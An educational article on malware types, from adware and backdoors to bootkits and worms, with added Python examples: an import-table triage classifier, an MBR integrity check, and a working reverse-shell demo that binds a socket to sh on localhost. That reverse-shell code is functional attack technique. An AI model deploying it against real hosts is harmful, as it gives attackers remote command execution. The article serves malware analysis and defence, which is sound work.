In this article we look at the different types of malware and what they do. When performing static or dynamic malware analysis, it is important to know the main malware types so that you can recognize them and focus your analysis. During static analysis, the imported DLLs and functions often reveal the malware's intentions and behavior. For example, when a sample imports networking functions together with Windows Registry and decompression functions, we may be dealing with spyware, downloader malware, or a Trojan that unpacks and runs itself or other malware at start-up. In the simplest case, where the DLLs are statically imported, a tool such as Dependency Walker shows which functions the sample uses. Further inspection of the DLLs, functions, PE headers and resources should narrow down the possible malware types considerably. Let us look at the different types of malware and what they do.
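As an added example (not part of the original article), here is a small Python triage helper that applies the reasoning above: it normalizes imported Win32 API names, maps them to capabilities and lists the malware classes from this article that such a combination suggests. The API-to-capability table, the class rules and the sample import lists are constructed for illustration and deliberately small; real tooling such as capa carries far more rules, and an import table can only narrow the candidates, never prove the type.

```python
"""Static triage of a PE import table: map imported Win32 API names to
capabilities and suggest which malware classes the combination resembles."""

# Constructed, deliberately small lookup of API name -> capability.
API_CAPABILITIES = {
    "network":     {"WSAStartup", "socket", "connect", "send", "recv",
                    "InternetOpen", "InternetOpenUrl", "InternetConnect",
                    "HttpSendRequest", "InternetReadFile", "URLDownloadToFile"},
    "registry":    {"RegOpenKeyEx", "RegSetValueEx", "RegCreateKeyEx"},
    "execute":     {"CreateProcess", "ShellExecute", "WinExec"},
    "compression": {"RtlDecompressBuffer", "LZOpenFile", "LZRead"},
    "keylog":      {"SetWindowsHookEx", "GetAsyncKeyState", "GetKeyState",
                    "GetForegroundWindow"},
    "injection":   {"VirtualAllocEx", "WriteProcessMemory", "CreateRemoteThread"},
    "crypto":      {"CryptAcquireContext", "CryptGenKey", "CryptEncrypt"},
    "file_enum":   {"FindFirstFile", "FindNextFile"},
}

# Capability combinations and the malware classes from this article they suggest
# (constructed rules; the same imports legitimately match several classes).
CLASS_RULES = [
    ("downloader / launcher",          {"network", "execute"}),
    ("downloader with persistence",    {"network", "execute", "registry"}),
    ("packed or self-unpacking Trojan", {"compression", "execute"}),
    ("keylogger / information stealer", {"keylog", "network"}),
    ("ransomware",                     {"crypto", "file_enum"}),
    ("launcher (process injection)",   {"injection"}),
]


def normalize(api_name):
    """Strip the ANSI/Unicode suffix (CreateProcessA / CreateProcessW -> CreateProcess).
    Only strips when the preceding character is lowercase, so names like WSAStartup survive."""
    if len(api_name) > 3 and api_name[-1] in "AW" and api_name[-2].islower():
        return api_name[:-1]
    return api_name


def flatten(imports):
    """Accept either a {dll: [functions]} mapping (as a PE import directory is usually
    presented) or a flat list of function names."""
    if isinstance(imports, dict):
        return [name for names in imports.values() for name in names]
    return list(imports)


def capabilities(imports):
    """Set of capabilities implied by the imported functions."""
    names = {normalize(n) for n in flatten(imports)}
    return {cap for cap, apis in API_CAPABILITIES.items() if names & apis}


def classify(imports):
    """Candidate malware classes, most specific rule (largest capability set) first."""
    caps = capabilities(imports)
    hits = [(label, need) for label, need in CLASS_RULES if need <= caps]
    hits.sort(key=lambda hit: (-len(hit[1]), hit[0]))
    return [label for label, _ in hits]


# Constructed import tables standing in for what Dependency Walker would show.
SAMPLE_DOWNLOADER_IMPORTS = {
    "KERNEL32.dll": ["CreateProcessA", "WriteFile", "Sleep", "GetTempPathA"],
    "WININET.dll":  ["InternetOpenA", "InternetOpenUrlA", "InternetReadFile"],
    "ADVAPI32.dll": ["RegOpenKeyExA", "RegSetValueExA"],
    "ntdll.dll":    ["RtlDecompressBuffer"],
}
SAMPLE_RANSOMWARE_IMPORTS = ["CryptAcquireContextA", "CryptGenKey", "CryptEncrypt",
                             "FindFirstFileW", "FindNextFileW", "DeleteFileW"]

if __name__ == "__main__":
    for label, sample in (("downloader", SAMPLE_DOWNLOADER_IMPORTS),
                          ("ransomware", SAMPLE_RANSOMWARE_IMPORTS)):
        print(label, sorted(capabilities(sample)), classify(sample))
```

The output for the first sample lists network, registry, execute and compression capabilities and ranks "downloader with persistence" first, which is exactly the "network plus Registry plus decompression" pattern described above; the second sample matches only the ransomware rule. Treat the result as a starting point for the deeper PE-header, resource and dynamic analysis the article goes on to describe.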
Adware is malicious software that presents unwanted advertising to the user, often as pop-ups that cannot be closed. Adware is frequently bundled with free software and browser toolbars. Adware that also collects user data, actions and other information for targeted advertising is called spyware.
A backdoor is malicious code that lets an attacker connect to an infected computer and take control of it, usually without the authentication that legitimate remote access would require. The backdoor is often installed by a Trojan and goes unnoticed if the host has no effective detection mechanisms. Backdoors can communicate in many ways; TCP port 80 with HTTP is a common choice because outbound web traffic is allowed from almost every computer connected to the Internet, so the backdoor's traffic blends in. We will discuss two kinds of backdoor: reverse shells and Remote Access/Administration Tools (RATs).
A reverse shell is a connection initiated by the infected host to the attacker that gives the attacker shell access to the host. The reverse shell is often created by a Trojan and acts as a backdoor on the infected host. Once the reverse shell is established, the attacker can execute commands as if they were typed locally. Malware developers can set up reverse shells in several ways; commonly they package Netcat with the malware or simply use the built-in cmd.exe. The simple method used by Windows malware is to create a socket that connects back to the attacker and bind it to the standard streams (standard input, output and error) of cmd.exe. Cmd.exe runs with its window hidden so the victim does not see it, and the attacker uses it to execute commands on the infected host.
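The mechanism just described, as an added Python example that is not part of the original article: the "victim" side connects out to a listener and starts a shell whose standard streams are the socket itself, and the "attacker" side sends a command over that socket and reads the result. Both ends run on 127.0.0.1 so the demonstration is self-contained; it assumes a POSIX system with sh (the Windows equivalent hands the socket to cmd.exe and hides the window, which this code only notes in a comment).

```python
import shutil
import socket
import subprocess
import threading

COMMAND = b"echo reverse-shell-test\nexit\n"   # what the "attacker" types into the shell


def attacker_listener(server_sock, results, command=COMMAND):
    """Attacker side: accept the inbound connection, send a command, collect the output."""
    conn, _ = server_sock.accept()
    with conn:
        conn.settimeout(10)
        conn.sendall(command)
        chunks = []
        try:
            while True:
                data = conn.recv(4096)
                if not data:            # shell exited, socket closed by the victim side
                    break
                chunks.append(data)
        except socket.timeout:
            pass
    results.append(b"".join(chunks).decode(errors="replace"))


def victim_reverse_shell(host, port):
    """Victim side: connect OUT to the attacker and hand the socket to a shell as its stdio.
    Popen accepts any object with fileno(), so the socket becomes fds 0, 1 and 2 of the shell.
    Windows malware does the same with cmd.exe, adding STARTUPINFO with SW_HIDE to hide the window."""
    sock = socket.create_connection((host, port))
    shell = shutil.which("sh") or "/bin/sh"          # assumption: POSIX host
    proc = subprocess.Popen([shell], stdin=sock, stdout=sock, stderr=sock)
    sock.close()                                      # the child holds its own descriptors
    proc.wait(timeout=10)
    return proc.returncode


def demo_reverse_shell():
    """Run both sides locally and return what the attacker received from the shell."""
    server_sock = socket.socket()
    server_sock.bind(("127.0.0.1", 0))                # ephemeral port
    server_sock.listen(1)
    server_sock.settimeout(10)
    port = server_sock.getsockname()[1]
    results = []
    listener = threading.Thread(target=attacker_listener, args=(server_sock, results))
    listener.start()
    victim_reverse_shell("127.0.0.1", port)
    listener.join(timeout=10)
    server_sock.close()
    return results[0] if results else ""


if __name__ == "__main__":
    print(demo_reverse_shell(), end="")
```

Nothing here is specific to malware; the same three lines (connect, Popen with the socket as stdio, wait) are what a packaged Netcat does with `-e`. On the defensive side, the tell-tale artefact is a shell process whose standard descriptors are a network socket rather than a terminal or pipe, which on Linux is visible in `/proc/<pid>/fd` and on Windows as cmd.exe with a parent that owns an outbound TCP connection.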
RAT – Remote Access Trojan
A Remote Access Trojan (RAT), sometimes called a remote administration or remote access tool, is software that gives an attacker control over an infected host through a backdoor. In this article we use the term remote access trojan to stress that we mean the malicious kind, not the remote support tools that system administrators and software vendors use legitimately for troubleshooting. Remote Access Trojans are often bundled with free software or sent as e-mail attachments.
A botnet is a network of compromised computers with backdoors that are controlled from a command and control (C2) server. All infected hosts in the botnet are controlled as a group and receive the same instructions from the attacker's server. Botnets are often used for spamming, distributed denial of service (DDoS) attacks, or malware distribution.
A browser hijacker is malicious code designed to take control of browser settings such as the home page or the default search engine. Browser hijackers are often bundled with free software and browser toolbars, and may also include adware and spyware. Some browser hijackers also change the browser's proxy settings, which compromises your privacy and online security because your web traffic can then be routed through a proxy the attacker controls.
Downloader malware is malware whose job is to download other malicious software. Attackers often plant a downloader when they first gain access to a system; it then silently infects the machine with whatever additional malware the attacker chooses.
Information Stealing Malware
Information-stealing malware is a group of malware types designed to steal information such as credit card numbers, bank account details, account credentials and other personal data. The collected information is sent to the attacker, who uses it to gain access to your accounts or sells or publishes it on the Internet. Common forms are keyloggers, password (hash) grabbers and network sniffers. Stolen information is usually sent to a command and control server for further processing.
A keylogger is malicious software (or hardware) that records keystrokes in order to capture passwords, conversations and other personal data, and sends the recorded keystrokes to the attacker. Keyloggers are a very effective way for cybercriminals to steal passwords because there is no need to crack hashes, decrypt data or intercept encrypted connections: the password is captured in the clear as it is typed.
A launcher is malicious software used to run other malicious programs, and it is often combined with a downloader. Launchers often use hidden and unconventional methods, such as injecting code into another process, to run the other malicious code without being detected.
Technically, all malware that prevents a user from accessing a computer or files and demands money in exchange for restoring access is ransomware. Ransomware often encrypts the hard drive or individual files and demands money for the decryption key; this variant is also called a crypto-locker. Once the machine is infected, the ransomware presents the user with several payment methods that can be used to unlock the computer or decrypt the files.
Ransomware has become more and more popular over time because it is very profitable for malware developers. Combined with anonymous payment methods such as Bitcoin, it makes a lot of money while reducing the risk of being caught. Well-known ransomware families are CryptoLocker, CryptoWall and Tox; Tox is known as the first ransomware-as-a-service, made available to anyone through the Tor network.
A rootkit is malicious software designed to hide the presence of other malicious programs. The hidden malware is often a backdoor that gives the attacker full access or steals information. Rootkits can be difficult to detect and remove depending on where they live: a firmware-level rootkit may require reflashing or replacing the hardware, while a kernel-level rootkit may require reinstalling the operating system.
Another dangerous and very hard to detect variant is the bootkit: a rootkit that infects the Master Boot Record (MBR) and therefore runs before the operating system. Even on a fully encrypted disk the MBR and the bootloader it loads are not encrypted, because they contain the code that asks for the passphrase and decrypts the drive. A bootkit that runs before that code can, for example, capture the key and bypass the disk encryption.
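The practitioner's counterpart to the above is an integrity check of the boot-code region of the MBR against a known-good hash. The following Python is an added example, not code from the original article: it builds a 512-byte MBR from constructed data (the boot code is filler, not a real bootloader), parses the partition table and boot signature, and shows that a trojanized copy whose first instruction has been redirected still has a perfectly valid partition table and 0x55AA signature, so only the hash comparison catches it. The sample bytes and the "infected" modification are constructed for illustration and do not reproduce any real bootkit.

```python
import hashlib
import struct

MBR_SIZE = 512
BOOT_CODE_LEN = 440            # bytes 0..439 boot code, 440..443 disk signature
PARTITION_TABLE_OFFSET = 446   # four 16-byte entries, 446..509
SIGNATURE_OFFSET = 510         # 0x55 0xAA
PARTITION_ENTRY = "<B3sB3sII"  # status, CHS start, type, CHS end, LBA start, sector count


def build_mbr(boot_code, partitions, disk_signature=0x1234ABCD):
    """Assemble an MBR from boot code and up to four (bootable, type, lba, sectors) tuples.
    Constructed test data only; CHS fields are left zero."""
    if len(boot_code) > BOOT_CODE_LEN:
        raise ValueError("boot code too long")
    mbr = bytearray(MBR_SIZE)
    mbr[:len(boot_code)] = boot_code
    struct.pack_into("<I", mbr, BOOT_CODE_LEN, disk_signature)
    for i, (bootable, ptype, lba, sectors) in enumerate(partitions[:4]):
        struct.pack_into(PARTITION_ENTRY, mbr, PARTITION_TABLE_OFFSET + 16 * i,
                         0x80 if bootable else 0x00, b"\0\0\0", ptype, b"\0\0\0", lba, sectors)
    mbr[SIGNATURE_OFFSET:] = b"\x55\xaa"
    return bytes(mbr)


def parse_mbr(mbr):
    """Validate the signature and return boot-code hash, disk signature and partition table."""
    if len(mbr) != MBR_SIZE:
        raise ValueError("an MBR is exactly 512 bytes")
    if mbr[SIGNATURE_OFFSET:] != b"\x55\xaa":
        raise ValueError("missing 0x55AA boot signature")
    partitions = []
    for i in range(4):
        status, _, ptype, _, lba, sectors = struct.unpack_from(
            PARTITION_ENTRY, mbr, PARTITION_TABLE_OFFSET + 16 * i)
        if ptype != 0:                                # type 0 means empty entry
            partitions.append({"bootable": status == 0x80, "type": ptype,
                               "lba": lba, "sectors": sectors})
    return {
        "boot_code_sha256": hashlib.sha256(mbr[:BOOT_CODE_LEN]).hexdigest(),
        "disk_signature": struct.unpack_from("<I", mbr, BOOT_CODE_LEN)[0],
        "partitions": partitions,
    }


def boot_code_unchanged(mbr, baseline_sha256):
    """Integrity check: compare the boot-code region with a hash recorded on a known-clean system."""
    return parse_mbr(mbr)["boot_code_sha256"] == baseline_sha256


# Constructed clean sample: placeholder boot code and one bootable NTFS-type (0x07) partition.
CLEAN_BOOT_CODE = b"\xfa\x33\xc0\x8e\xd0\xbc\x00\x7c" + b"\x90" * 32   # filler, not real code
CLEAN_MBR = build_mbr(CLEAN_BOOT_CODE, [(True, 0x07, 2048, 1_000_000)])
BASELINE = parse_mbr(CLEAN_MBR)["boot_code_sha256"]

# Constructed "infected" copy: the first instruction is replaced by a jump into attacker code placed
# later in the boot-code region, the general shape of an MBR hook. Partition table and signature stay
# intact, so the sector still looks valid to a naive parser.
_infected = bytearray(CLEAN_MBR)
_infected[0:3] = b"\xe9\x00\x01"          # jmp rel16 (constructed)
_infected[0x100:0x110] = b"\xcc" * 16     # where hook code would live (constructed filler)
INFECTED_MBR = bytes(_infected)

if __name__ == "__main__":
    for name, image in (("clean", CLEAN_MBR), ("infected", INFECTED_MBR)):
        info = parse_mbr(image)
        print(name, info["partitions"], "boot code unchanged:",
              boot_code_unchanged(image, BASELINE))
```

Two caveats apply to using such a check for real. The comparison must be run from a trusted environment, for example after booting from clean media, because a rootkit active in the running operating system can return a clean copy of sector 0 to any program that reads it. On modern UEFI systems the disk uses GPT rather than an MBR and the boot path is protected by Secure Boot and measured boot, so the equivalent check is against the firmware's measurements rather than a hand-computed sector hash.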
Scareware is malicious software that frightens the victim into buying something. It is also called blackmail software because it often threatens the victim with supposed viruses or embarrassing files. The most common form poses as a virus scanner that reports infections which will be removed as soon as the victim buys the full product; in reality the only malware on the machine is the scareware itself.
Scareware relies on intimidation and confusion so that the victim does not escalate the problem to the system administrator at work or call in professional help to remove the "virus". Because of this tactic, many victims pay for the software to make the problem go away quietly. Like ransomware, scareware is very profitable for malware developers.
Spam Sending Malware
Spam-sending malware is malicious software that uses an infected machine to send spam. It is usually part of a botnet controlled by a command and control server, which turns the infected machines into a distributed spam-sending network. Because of the distributed approach there is no single point of failure: if a quarter of the infected machines are cleaned, the remaining three quarters keep sending spam. Big botnets can send billions of spam messages per week, and new malware is very often distributed along with the spam. Spamming malware causes trouble for the victim too, because the ISP may disable the Internet connection or the victim's e-mail address may be blacklisted, so remove this type of malware as soon as possible. It is profitable for malware developers because they can sell spam-sending services.
A Trojan, or Trojan horse, is malware that poses as something harmless and usually installs a backdoor.
Just like the ancient Greek story of the wooden horse with Greek troops inside that was used to enter the city of Troy, a computer Trojan looks like a normal application, media file or other file but carries a malicious payload. Trojans are often distributed through social engineering, where the victim is tricked into running the file or application that contains the Trojan. Most Trojans contain backdoors that an attacker can use to steal information, spread other malware, or add the infected machine's resources to a botnet. Computer Trojans have been around for a long time; well-known old examples are NetBus, SubSeven (Sub7) and Back Orifice (BO).
A virus is a malicious program that copies itself into other applications, files or even the boot sector. The virus can then do whatever it is programmed to do, such as steal information, log keystrokes, or render the computer unusable. The defining characteristic of a virus is that it replicates by inserting its code into other programs without the user's consent. Like most other malware today, viruses are usually written for profit.
A worm is a malicious program that copies itself in order to spread to and infect other systems. Computer worms spread through networks, shared drives, P2P networks and e-mail, and by exploiting vulnerabilities. The difference from a virus is that a virus inserts its code into other programs, whereas a worm replicates as a standalone program. Worms do not necessarily carry a payload, although most do; some are designed only to spread.
I hope this article was useful to you. Its main purpose is to show what the different types of malware do, so that when you find an infection you know what kind of malware you are dealing with and how to fight it.